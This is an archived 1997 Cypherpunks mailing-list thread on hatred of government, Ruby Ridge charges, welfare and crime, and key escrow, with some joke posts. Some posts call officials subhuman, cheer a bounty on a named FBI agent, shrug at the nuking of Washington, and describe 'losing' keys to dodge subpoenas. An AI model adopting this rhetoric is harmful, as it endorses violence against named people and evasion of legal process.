At 07:06 PM 8/21/97 +0200, a confused Zooko Journeyman wrote:
>BULL SHIT.

Two words used to describe EVERTHING Zooko is about to say.

>This is a cop-out, used by emotionally stunted men to excuse 
>themselves from their solemn responsibility to ethically 
>justify their own actions and to deal fairly with their fellow
>humans.

What the hell is an "Emotionally stunted man", any way, Zooko?

>By reciting mantras to one another emphasizing their sense of 
>having been mistreated and their sense of having 
>_unquestionable_ moral superiority, people in this situation 
>persuade each other to become more and more fanatical in their 
>attitudes, less and less in touch with reality, and less and 
>less compassionate towards the "others" who have been demonized
>in the process.

I don't see what's fanatical about hating a government.

>Note that this process _always_ includes a group of other 
>humans which are demonized in order to serve as a scapegoat and
>as a concrete focus for the participant's negative emotions.

Question, Zooko:

Who the fuck makes gun laws, helps pass censor laws, anti-freedom and
encryption laws, anyway???

>This process is objectively identical to the process 
>experienced by _all_ hate groups, gangs and nationalists.

We don't *demonize*, we put the blame on the guilty.

>You are standing in the auditorium, Louis Freeh's face is 
>displayed on the screen, interposed with film of jackbooted 
>thugs breaking down your door, and you are screaming wordlessly
>at him along with all of your brethren during the Two Minutes 
>Hate.

Think about this, Zooko:

You are standing, along with your other sheeple, screaming, throwing
objects, at Tim McVeigh, with images of Flag-waving freedom-fighters
(terrorists, by government terms) behind his face.

>THAT should give you pause for thought, Ray.

THAT above should give YOU pause for thought, Zooko.

>Listen to me:  I might take up arms in the trenches next to you
>someday, if it comes to that.  I might murder enemies or 
>civilians in their sleep, if I were convinced that it was the 
>only way to preserve the people and the ideals that I love.  
>I might work to deploy ideas and technologies that threaten to
>induce social chaos, if I believed that those ideas and 
>technologies were the only way to ensure the blessings of 
>liberty and prosperity for my children.

And that is what most of us feel.

>But I will _never_ take one of these actions while intoxicated
>by a cloud of hatred and self-righteousness.  I will _never_ 
>tell myself that I am part of a sacred jihad which absolves me
>of all guilt, and I will _never_ re-classify my enemies as 
>sub-human in order to justify my treatment of them.

Sacred Jihads who work to overthrow the U.S. government, in order to
establish a more libertarian one?

I consider anyone as being sub-human who bursts through my door, armed
heavily, and with intent to steal my possesions, and my freedom, and
my sovreignity over my house.

>So take a fucking BREAK man.  Just get up from the computer and
>go for a fucking walk in the mountains and think about your 
>fucking family and loved ones.

And I'm sure you'll be thinking the same thing one day if THEY bust
down YOUR door, and fire at your wife, holding a baby daughter of
yours.

If they come at your house with a tank, outside standing, are hundreds
of armed ATF agents.

If they come to steal your wealth, force you from your house, after
seeing your are an enemy of the people, destroy your possesions, and
force you to a concentration camp.

Think about it, Zooko.  Don't close your mind in the shroud of hatred
for those different from you.






From dformosa at st.nepean.uws.edu.au  Thu Aug 21 17:11:50 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Fri, 22 Aug 1997 08:11:50 +0800
Subject: heart
In-Reply-To: 
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 21 Aug 1997, Ray Arachelian wrote:

> The elected scum are far from being human.

We can't let one group or other be considered less the human[1].  No one
is less or more desurving of basic rights.  The second you allow yourself
to take that fundermentle step of saying that a group is less worthy then
anouther group you tread down the path that leeds to desaster.

> Apparently you haven't been paying attention to lovely incidents
> involving plungers.

The unfortunate inserdent with the plunger is an eclent example of what
I'm saying.  This the victom was reduced from a human to someone without
thouse rights in the mind of the perpertator.

[...]

> What compassion did they show?  Toilet plungers?  Bullets in the head,
> flame throwers and tanks?

So we should resond in a simmler mannor?

[...]

> > Note that this process _always_ includes a group of other 
> > humans which are demonized
[...]
> Right.  Same thing they must have been feeding the FBI the morning of the
> Waco incident.

Exactly.  I can see a hellish future where the Cyperpunks have become the
FBI.  While we may be canting cyperpunk type ideology we would be doing
FBI style actions.

[...]

> The difference is that no one is telling me to hate or feel rage.  The
> actions of those who abuse freedom are my only inspiration.

Annd who will have freedom in your would?  Your suggested means tell me
more about your motives then your speech dose.


[1] Unless like me thay have volenterly rejected that lable [2]
[2] It however dosn't mean I regard myself less or more disuriving of
basic 'human' rights.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM/yZXKQK0ynCmdStAQGLKAQAhhdAR1yEOPFu/btbwm0Vq9vwa8MM5rsm
HFkPuL1q72z6A/o/iidy90tlgvesEQFOajKdAVMWWcXHaA4t4c/PzyV4YZ6j3hub
OnhL6kY8pj901bgnBsA1oVbbi2H7HN7obynCWs3NxdC8BNZiaEKhj2CtEGbsS16T
g/QMqix6C64=
=Xocc
-----END PGP SIGNATURE-----






From nobody at REPLAY.COM  Thu Aug 21 17:16:46 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Fri, 22 Aug 1997 08:16:46 +0800
Subject: Microsoft TV announces new TV Dinner product
Message-ID: <199708212358.BAA17871@basement.replay.com>



INSTRUCTIONS FOR MICROSOFT'S NEW TV DINNER PRODUCT
   :
   :  You must first remove the plastic cover.  By doing so you agree to
   :  accept and honor Microsoft rights to all TV dinners.  You may not
   :  give anyone else a bite of your dinner (which would constitute an
   :  infringement of Microsoft's rights).  You may, however, let others
   :  smell and look at your dinner and are encouraged to tell them how
   :  good it is.
   :
   :  If you have a PC microwave oven, insert the dinner into the oven.
   :  Set the oven using these keystrokes:   
<\mstv.dinn.//08.5min at 50%heat//
   :  Then enter: 
Message-ID: 



At 11:34 AM -0700 8/21/97, ? the Platypus {aka David Formosa} wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>On Thu, 21 Aug 1997 gturk at concentric.net wrote:
>
>> TruthMonger wrote:
>>
>> >  Tim speaks of those who feel it is their duty/right to "collect
>> >tribute from those who don't want to make the contribution freely."
>>
>> You must be referring to the Cult of Redistribution.
>
>The way I see it is quite simple,  if these peaple where not payed off it
>is most likely that thay will turn to crime.  Other then condemming every
>single impovished person to death, this is one of the better soultions to
>a difficalt problem.
>
>- --
>Please excuse my spelling as I suffer from agraphia see the url in my header.

Given that the U.S. already has a huge system for redistributing wealth,
and a very high crime rate, what is your evidence for your claim?

Agraphia or not, this is one of the lamest posts I've seen in years. Wealth
is to be taken from those who have worked for it or put their capitcal at
risk and given ("redistributed") to those who have done neither, just
because we're afraid they'll steal it from us or "turn to crime" if we
don't pay them off?

What's wrong with chopping the hands off of thieves and executing muderers?
A lot of cultures have very little forcible redistribution of wealth, and
little crime.

The United States has a lot of redistribution of wealth and a lot of crime.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From sunder at brainlink.com  Thu Aug 21 18:12:40 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Fri, 22 Aug 1997 09:12:40 +0800
Subject: heart
In-Reply-To: 
Message-ID: 



On Fri, 22 Aug 1997, ? the Platypus {aka David Formosa} wrote:

> We can't let one group or other be considered less the human[1].  No one
> is less or more desurving of basic rights.  The second you allow yourself
> to take that fundermentle step of saying that a group is less worthy then
> anouther group you tread down the path that leeds to desaster.

They already make themselves less than human by their actions, not by
their identity.

> The unfortunate inserdent with the plunger is an eclent example of what
> I'm saying.  This the victom was reduced from a human to someone without
> thouse rights in the mind of the perpertator.

Untrue, the victim remained human, the cop was inhuman in his treatment.
It doesn't matter what his thoughts were, his actions made him inhuman.

> So we should resond in a simmler mannor?

An eye for an eye, a toilet plunger for another.  That's the only true
justice there can be. 

> Exactly.  I can see a hellish future where the Cyperpunks have become the
> FBI.  While we may be canting cyperpunk type ideology we would be doing
> FBI style actions.

Distinction: cypherpunks don't want to control or take away your privacy.
Cypherpunks don't use toilet plungers.  Cypherpunks write code. :)
FBI should NOT exist.

> Annd who will have freedom in your would?  Your suggested means tell me
> more about your motives then your speech dose.

Everyone.  Not in my world, but everyone's world.  The only law that
should exist is "do what you will as long as you harm none."  By harm I
only mean the following: physically (i.e. beat, kill, maim, etc.) and
property (i.e. theft, damage.)  Everything else is just excess bullshit.

There are a billion and one ways to harm a person physically.  You don't
need a billion and one laws to state that it is wrong.  One is sufficient.

> [1] Unless like me thay have volenterly rejected that lable [2]
> [2] It however dosn't mean I regard myself less or more disuriving of
> basic 'human' rights.

Who does?  Who deserves less than basic human rights?  And yes, unlike the
scum that run the FBI, I include total privacy as a basic human right.
Just as important as the right to speak, think, or breathe air.

I understand your fears, but hating the enemy and knowing the enemy isn't
becoming it.  Revolutions aren't about taking over, they're about freedom
from the injustices done by the older regime.  Sure, in time the political
scum will rise to the top and another will be needed.  We've seen that
here already.


=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From enoch at zipcon.net  Thu Aug 21 18:13:11 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Fri, 22 Aug 1997 09:13:11 +0800
Subject: State Charges in Weaver Case
Message-ID: <19970822005931.27111.qmail@zipcon.net>



Here's an odd Ruby Ridge development, which just floated across
Reuters.

Idaho prosecutors have filed two sets of state charges against
persons involved in the incident.

Kevin Harris was charged with First Degree Murder for "killing
Deputy U.S. Marshall William Degan willfully and with malice
aforethought."

FBI Sniper Lon Horiuchi was charged with involuntary manslaughter
in the death of Vicki Weaver.

Shouldn't it be First Degree Murder for deliberately killing
someones wife with a baby in her arms, and involuntary
manslaughter for using possibly excessive force against an armed
attacker?

Seems a bit backwards to me.

I suppose it has something to do with that "only following
orders" thing. :)

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}






From nobody at REPLAY.COM  Thu Aug 21 18:17:20 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Fri, 22 Aug 1997 09:17:20 +0800
Subject: heart
In-Reply-To: 
Message-ID: <199708220055.CAA28492@basement.replay.com>



At 05:39 AM 8/22/97 +1000, you wrote:
>> What compassion did they show?  Toilet plungers?  Bullets in the head,
>> flame throwers and tanks?
>
>So we should resond in a simmler mannor?

Should we just sit idly by and let police officers attack citizens?

Or maybe we should do what our founders wanted, defend ourselves with
miliary rifles.  So if a pig wants to shove a crowbar up your ass, are you
going to shoot him, or just say "I would never violate your rights like this!"
/============================================================\
 "The right of the people to be secure in their persons,   houses,  papers,
and effects, against unreasonable searches   and  seizures, shall not be
violated."
			-U.S. Constitution, Amendment IV
\============================================================/






From enoch at zipcon.net  Thu Aug 21 18:22:37 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Fri, 22 Aug 1997 09:22:37 +0800
Subject: State Charges in Weaver Case
Message-ID: <19970822011026.30088.qmail@zipcon.net>



One additional news tidbit.  

FBI director Louis Freeh said he was "extremely disappointed" in the
charges against Horiuchi, and promised that the Federal Government 
would spare no expense in defending him against them. 

Hey, I've got an idea.  Is Stephan Jones free? :)

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}






From sunder at brainlink.com  Thu Aug 21 18:37:37 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Fri, 22 Aug 1997 09:37:37 +0800
Subject: State Charges in Weaver Case
In-Reply-To: <19970822005931.27111.qmail@zipcon.net>
Message-ID: 



On Thu, 21 Aug 1997, Mike Duvos wrote:

> I suppose it has something to do with that "only following
> orders" thing. :)

Fine, then what shall we charge the one that gave the order with?  And
what shal be the punishment?  If the one who takes the order relinquishes
reposability, then the one giving the order must be doubly responsible.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From whgiii at amaranth.com  Thu Aug 21 18:38:55 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Fri, 22 Aug 1997 09:38:55 +0800
Subject: Socio-Economic Cults (Re: CypherPunk Cults)
In-Reply-To: 
Message-ID: <199708220125.UAA13805@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In , on 08/21/97 
   at 05:56 PM, Tim May  said:

>The United States has a lot of redistribution of wealth and a lot of
>crime.


This is one of the problems of socialism.

When you have a group in society that never has to earn what they have
they tend to have little respect for the property of others.

A prime example is the welfair class in America. All their basic needs are
provided for by the State (food, housing, medical, education, ...) and yet
they have the highest crime rates. And make no mistake this isn't 18th
century England where people are stealing a loaf of bread to survive the
majority of these criminal are commiting their crimes to support their
entertainments.

Eliminate the Welfair state and allow people to defend their persons &
property without fear of retribution from the state and you will see a
dramatic decline in the crime rates in this country.

Somthing is seriously wrong when a home owner is more afraid of the
consequences of defending his home than his is from the criminals
attacking it.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM/zc+Y9Co1n+aLhhAQH2uQP/d2PpyTwFgQSXGZ+ZpnK3KdFofRumf8j6
T1ftpSe3P5uowU2GgPJg8+PyFliu6Hq1y0xwnFR7LqbttUv5FeDQ2h5OURQXPuCe
VE7AP7vka1Hx8CDTW4cvgU6yoAgcDeds5AiMFVbOh91xZFb1M3JHqKXXbp982o5g
VQEmbc4uYps=
=fhCU
-----END PGP SIGNATURE-----






From sunder at brainlink.com  Thu Aug 21 19:01:12 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Fri, 22 Aug 1997 10:01:12 +0800
Subject: Socio-Economic Cults (Re: CypherPunk Cults)
In-Reply-To: <33FC3B4B.6729@dev.null>
Message-ID: 



On Thu, 21 Aug 1997, Tim G. May wrote:

> "When all you have is a gun, everything looks like a target."
> 
> Tim G. May

When all you have are arrest warrants, everyone looks like a drug dealer.
:)

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From tcmay at got.net  Thu Aug 21 19:14:32 1997
From: tcmay at got.net (Tim May)
Date: Fri, 22 Aug 1997 10:14:32 +0800
Subject: Breaking Legal News....
Message-ID: 





(Apologies if these stories have already been discussed...my ISP is making
changes to the system, and outages have ensued...)

First, the Ruby Ridge killer Lon Horiuchi will have to leave his protective
WitSec  program to stand trial for the murder of Vicki Weaver, who was
unarmed and whom he fired at recklessly. The charges: manslaughter.

(I don't defend the bounty being placed on Horiuchi's head, which I
understand is up to $125,000. Them danged militias are practicing AP. My
hunch is that old Lon is gonna get shivved one way or another.)

Second, charges have also been filed against Kevin Harris, who was tried in
a Federal court, and acquitted. Now the state is repeating the trial. (And
the litigation was extensive in the Harris case, and Harris was acquitted
based on a self-defense argument--for those who didn't follow it, the Feds
were lying in camouflage, shot the dog, then the son of Randy Weaver fired
at the Feds, the Feds killed the son, then Kevin Harris fired back, killing
a Fed. In other words, a classic close quarters fire fight, initiated by
the Feds without warning.)

As with the Rodney King Four, this is not being called a case of "double
jeopardy." If the state charges don't stick, try again in a different
jurisdiction, Federal. If the Federal charges don't stick, file in a
different jurisdiction, the state. I call this double jeopardy, and I don't
see how a reasonable person cannot call it this. Perhaps the Feds can have
a victim persecuted (er, prosecuted) first at the local level. If that
fails, the state level. If that fails, the Federal level. And should that
fail, the World Court in the Hague could take over the case and put
Interpol onto the persecuted.

Third, the Disneyland case is proceeding. The children "traumatized" by
seeing the actor playing Mickey remove his mouse head in front of them. Oh,
the horrors! And this is set to be a _jury_ trial. If I were called in and
forced to sit on this jury, collecting my oh-so-generous $5 or $10 a day,
I'd pull out my H & K and blow someone away. (The hysterical grandmother,
acting out her inner demons, deserves a Hasty Pudding prize for overacting
and absurdity. You have to see it yourself.)

Fourth, and then there's the Florida case of the woman who claimed a CAT
machine took away her psychic powers and collected a million dollars  in a
jury trial. (I lied about this one being "breaking" news...it's actually
from Peter Huber's excellent book about frivolous lawsuits and science on
trial...I think that was the name of it, "Galileo's Revenge: Science on
Trial," or similar.)

And the taxpayers gets to pay for most of this shit.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From sunder at brainlink.com  Thu Aug 21 19:16:08 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Fri, 22 Aug 1997 10:16:08 +0800
Subject: passing on a chuckle (fwd)
Message-ID: 




Noah's Ark... If it happened today

   And the Lord spoke to Noah and said,  "In six months I'm going
to make it rain until the whole earth is covered with water and all the
evil people are destroyed.  But I want to save a few good people, and two
of every kind of living thing on the planet.  I am commanding you to build
An Ark."
   And in a flash of lightning, He delivered the specifications for an
Ark. "Okay," said Noah, trembling with fear and fumbling with the
blueprints.
  "Six months, and it starts to rain," thundered the Lord. "You'd better
have the Ark completed, or learn to swim for a very long time."
  Six months passed, the skies clouded up and rain began to fall.
  The Lord saw that Noah was sitting in his front yard, weeping.
  And there was no Ark.
  "Noah," shouted the Lord, "Where is the Ark?"
  "Lord, please forgive me!" begged Noah. "I did my best.  But there were
big problems.  First, I had to get a building permit for the Ark
construction project, and your plans didn't meet code.  So I had to hire
an engineer to re-draw the plans.  Then I got into a big fight over
whether or not the Ark needed a fire sprinkler system.
   "Then my neighbor objected, claiming I was violating zoning by
building the Ark in my front yard, so I had to get a variance from the city
planningcommission.
  "Then I had problems getting enough wood for the Ark, because there was
a ban on cutting trees to save the Spotted Owl.  I had to convince the
U.S. Fish and Wildlife that I need the wood to save the Owls.  But they
wouldn't let me catch any owls, So, no owls.
  "The carpenters formed a union and went out on strike.  I had to
negotiate a settlement with the National Labor Relations Board before
anyone would pick up a saw or hammer.  Now we have sixteen carpenters
going on the boat, and still no owls.

  "Then I started gathering up animals, and got sued by an animal
rights group.  They objected to me taking only two of each kind.
  "Just when I got the suit dismissed, EPA notified me that I
couldn't complete the Ark without filing and environmental impact
statement on your proposed flood.  They didn't take kindly to the idea
that they had no jurisdiction over the conduct of a Supreme Being.
  "Then the Army Corp of Engineers wanted a map of the proposed
new flood plain.  I sent them a globe.
  "Right now, I'm still trying to resolve a complaint from the Equal
Employment Opportunity Commission over how may Croatians I'm supposed to
hire. The IRS has seized all my assets, claiming I'm trying to avoid
paying taxes by leaving the country.  And I just got a notice from the state
about owing them some kind of use tax.  I really don't think I can finish the
Ark for at least another five years," Noah wailed.
   The sky began to clear.  The sun began to shine.  A rainbow
arched across the sky. Noah looked up and smiled.
  "You mean you're not going to destroy the earth?" Noah asked
hopefully.
  "No," said the Lord sadly.  "The government already has."







From tcmay at got.net  Thu Aug 21 19:31:25 1997
From: tcmay at got.net (Tim May)
Date: Fri, 22 Aug 1997 10:31:25 +0800
Subject: Inside the Cypherpunks Cult
In-Reply-To: <19970819234915.63274@bywater.songbird.com>
Message-ID: 



At 12:29 PM -0700 8/21/97, Duncan Frissell wrote:


>One minor difference is that most cults don't manage to convince the head of
>the FBI and various other national leaders that their scenario is possible.
>[I'm not saying that we actually convinced anyone ourselves but we certainly
>share a vision of a possible future with Freeh and various intelligence
>types.]  They talk about their fears of digital anarchy all the time.  I
>don't remember the FBI director talking about the Lamb and the Book of Rev
>like Koresh or about the saucer behind Hale-Bopp like Heaven's Gate.
>
>Not an ordinary cult.
>
>DCF
>
>"If Vince Foster had a gun he'd be alive today."

Or the variant, "If Nicole Brown Simpson had a gun, she'd be a rich widow
today."

On the subject of cults, neither do cult leaders sit on panels at the
Computers, Freedom, and Privacy conference and mingle with the leading
lawyers, law professors, NSA employees, and Justice Department
representatives.

(As I have said, though this may have been before Crispin's time on this
list, I've had polite contacts with Stuart Baker, former top counsel to the
NSA, over the years. He clearly disagrees with my political agenda, as I do
with his (though he is showing some backbone as top lawyer arguing against
the CALEA/DT provisions).

Yes, it is obviously a bit of hyperbole to say we long for the nuking of
Washington. In fact, the way this thread started, at least my involvement
in it, was by my comment that if a soft target like D.C. were to vanish in
a puff of nuclear smoke, I wouldn't cry any tears. "So sue me."

And I actually do think unbreakable crypto will have profound effects on
taxation, which the government thinks is so, also. And will make it
possible for virtual communties to communcate securely, including for the
planning and execution of freedom fighting or "terrorist" activities. The
government also agrees with this one.

Where we differ is that first, I don't worry overmuch about what some
foreigners are doing to other foreigners. I take George Washington at his
word: avoid foreign entanglements. Not America's business if the Hutus are
killing the Tutsis, or vice versa, or if the Nazis are killing the Jews, or
vice versa.

Second, we differ in that I don't think converting the U.S., or the world,
into a totalitarian, surveillance state is an acceptable price to pay to
stop some crimes. Louis Freeh believes otherwise.

Third, these forces, once unleashed, have an unfolding force of their own.
Denning admits this, Freeh admits this, Reno admits this, Baker admits
this. Which is why the government is so concerned.

Hardly the stuff of a cult, is it?

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From whgiii at amaranth.com  Thu Aug 21 19:39:17 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Fri, 22 Aug 1997 10:39:17 +0800
Subject: Breaking Legal News....
In-Reply-To: 
Message-ID: <199708220232.VAA14845@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In , on 08/21/97 
   at 07:11 PM, Tim May  said:

>(I don't defend the bounty being placed on Horiuchi's head, which I
>understand is up to $125,000. Them danged militias are practicing AP. My
>hunch is that old Lon is gonna get shivved one way or another.)

Well I do. :)

The day that Brown Shirt gets his we will be having a large party to
celebrate. :)

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM/zsvo9Co1n+aLhhAQHt5AP8Ckj63mpnRpkzGLNU76YiRhA6oBZO2AB1
mowgIzNkpCofc1xLAfb5XUb+lTNx+DqGlswo4mmbYkQvb+eEO8ZWwShpiDahdGsR
rmAzYoiUfOBD//7Lhq2V1qGYsDBSLTeMR7yWsaZEDM5vfbpWbBIxNGQio3w7Yycu
D1NU2yeXjjw=
=o7cX
-----END PGP SIGNATURE-----






From shamrock at netcom.com  Thu Aug 21 19:39:54 1997
From: shamrock at netcom.com (Lucky Green)
Date: Fri, 22 Aug 1997 10:39:54 +0800
Subject: Socio-Economic Cults (Re: CypherPunk Cults)
In-Reply-To: <1.5.4.32.19970821161048.00743ce8@pop.pipeline.com>
Message-ID: <3.0.2.32.19970821192556.007306d8@netcom10.netcom.com>



At 01:00 PM 8/21/97 -0700, Tim May wrote:
>Technical
>solutions abound, of course, such as hosting the archives in offshore
>locations, or using strong crypto....and "forgetting" the key. This,
>obviously, is yet another reason the authorities want "key recovery.")

At a recent Cypherpunks meeting, I had a conversation with a person working
for a Very Large defense contractor. His company plans to literally use
thousands of keys. Their strategy when faced with a subpoena is to hand
over n-m of the total n keys. (m << n) The other keys just can't be found.
After all, it is perfectly reasonable that a few keys out of several
thousand get lost. To quote: "those keys simply won't be subject to subpoena".

I do not know which type of information will be encrypted with said keys.
Of course, neither will others, since the data will remain encrypted...

Remember this the next time you hear some clueless idiot claim that
industry wants full key recovery. The last thing industry needs is access
to all their confidential information during discovery.


--Lucky Green 
  PGP encrypted mail preferred.
  DES is dead! Please join in breaking RC5-56.
  http://rc5.distributed.net/






From forger at dev.null  Thu Aug 21 19:44:30 1997
From: forger at dev.null (Tim G. May BFD)
Date: Fri, 22 Aug 1997 10:44:30 +0800
Subject: Bad Forgery / Re: Socio-Economic Cults (Re: CypherPunk Cults)
In-Reply-To: <1.5.4.32.19970821161048.00743ce8@pop.pipeline.com>
Message-ID: <33FC87FA.5E6E@dev.null>



Tim G. May *DID*NOT* write:
> "When all you have is a gun, everything looks like a target."
> 
> Tim G. May
> There's something wrong when I'm limping on a decreasing number of toes
> -----------------------------------------------------------------------
>     This post is selflessly copyrighted under the auspices of the
>              Electronic Bad Forgery Foundation (TM).
> ~~~~
>        {This probably means it's Toto again. Check the headers.}
>                                                                    ~~~~
>         "Imitation is the sincerest form of forgery."
> -----------------------------------------------------------------------

  This is obviously a bad forgery. (It's a *good* bad forgery, however.
I almost thought I did it myself.)
  The giveaway in this forgery is the fact that I actually work for the
"Bad Forgery Department" of the B.F. Deal Record Company, Austin, TX.

Tim G. May
    There's something wrong when I'm a forger under an increasing
            number of duplicitous schiziod breaks.
-----------------------------------------------------------------------
    This post is selflessly copyrighted under the auspices of the
                Bad Forgery Department, B.F. Deal (TM).
~~~~
                {Has anyone seen my medicine? -- Toto}
                                                                   ~~~~
  "Imitation is the sincerest form of Obsessive-Compulsive Disorder."
-----------------------------------------------------------------------






From ravage at ssz.com  Thu Aug 21 20:06:07 1997
From: ravage at ssz.com (Jim Choate)
Date: Fri, 22 Aug 1997 11:06:07 +0800
Subject: Inside the Cypherpunks Cult (fwd)
Message-ID: <199708220254.VAA18931@einstein.ssz.com>



Forwarded message:

> Date: Thu, 21 Aug 1997 19:24:51 -0700
> From: Tim May 
> Subject: Re: Inside the Cypherpunks Cult

> On the subject of cults, neither do cult leaders sit on panels at the
> Computers, Freedom, and Privacy conference and mingle with the leading
> lawyers, law professors, NSA employees, and Justice Department
> representatives.

Never heard of the Pope then...

or Reverend Moon perhaps?

Or Mother Teresa...

Or perhaps the crazy guy from Oklahoma or Kansas or wherever who sat with
Bush during the final moments of his first election. I believe he was also
there when Desert Storm was launched. Has a big university named after
him. Oh Jesus, just can't think of his name...

Cults of personality are a function of being human, not what that human does
with their time.

You are confusing cause and effect.

> Where we differ is that first, I don't worry overmuch about what some
> foreigners are doing to other foreigners. I take George Washington at his
> word: avoid foreign entanglements. Not America's business if the Hutus are
> killing the Tutsis, or vice versa, or if the Nazis are killing the Jews, or
> vice versa.

And, yet, at the same time he had no compunction at all against buying arms
and influence from France...

Are any of them American Jews?...

Remember one thing oh Great Bawana Hunter May...

He who stands alone, dies alone.

What I would like to see is our favorite TLA jack-booted thugs to surround
some poor compound and then find themselves surrounded by thousands of
pissed-off gun-toting Americans daring the chicken-shits to do anything
about it. Any TLA clown that doesn't put their guns down immediately clearly
doesn't make much of the oath they swore to uphold the Constitution. And any
soldier who fires on Americans is clearly going against prima facia evidence
that the framers intended for American military force to NEVER be used
against American citizens on American soil. The soldier who killed the kid
down in the valley and got off scott free should face charges of treason.
So should his commanders all the way to ole Billary.

Consider, the law recognizes a parents right to sue an amusement park
because some incidental activity led to emotional distress what prevents us
from sueing the federal government for various criminal and civil penalties
relating to the physical and emotional suffering their actions have caused.
Hell, file a suite in the name of all Americans...

    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From kent at songbird.com  Thu Aug 21 20:24:35 1997
From: kent at songbird.com (Kent Crispin)
Date: Fri, 22 Aug 1997 11:24:35 +0800
Subject: An end to "court appointed attorneys"
In-Reply-To: <19970820222934.23073@bywater.songbird.com>
Message-ID: <19970821201546.04625@bywater.songbird.com>



On Thu, Aug 21, 1997 at 11:54:31AM -0400, Ray Arachelian wrote:
> On Wed, 20 Aug 1997, Kent Crispin wrote:
> 
> > One wonders if there is a microscope powerful enough to resolve Tim 
> > May's heart.
> 
